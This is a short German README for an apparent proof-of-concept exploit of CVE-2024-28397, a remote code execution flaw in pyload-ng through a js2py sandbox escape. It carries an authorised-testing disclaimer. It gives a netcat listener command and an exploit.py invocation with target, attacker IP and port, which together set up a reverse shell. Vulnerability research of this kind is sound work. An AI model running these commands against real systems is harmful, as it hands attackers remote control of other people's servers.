
PoC-Exploit für CVE-2024-28397 – Remote Code Execution in pyload-ng durch js2py-Sandbox-Escape
Dieses Repository enthält einen Proof-of-Concept (PoC)-Exploit für CVE-2024-28397, eine Remote Code Execution-Schwachstelle, die pyload-ng aufgrund unsicherer Verwendung von js2py betrifft.
Haftungsausschluss:
Dieser PoC dient ausschließlich zu Bildungs- und Forschungszwecken.
Verwenden Sie ihn nicht auf Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.
Der Autor übernimmt keine Verantwortung für jeglichen Missbrauch dieses Codes.
js2py in pyload-ngSie benötigen Python 3.x, die requests-Bibliothek und netcat zum Abfangen der Reverse Shell.
nc -lvnp 4444
python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123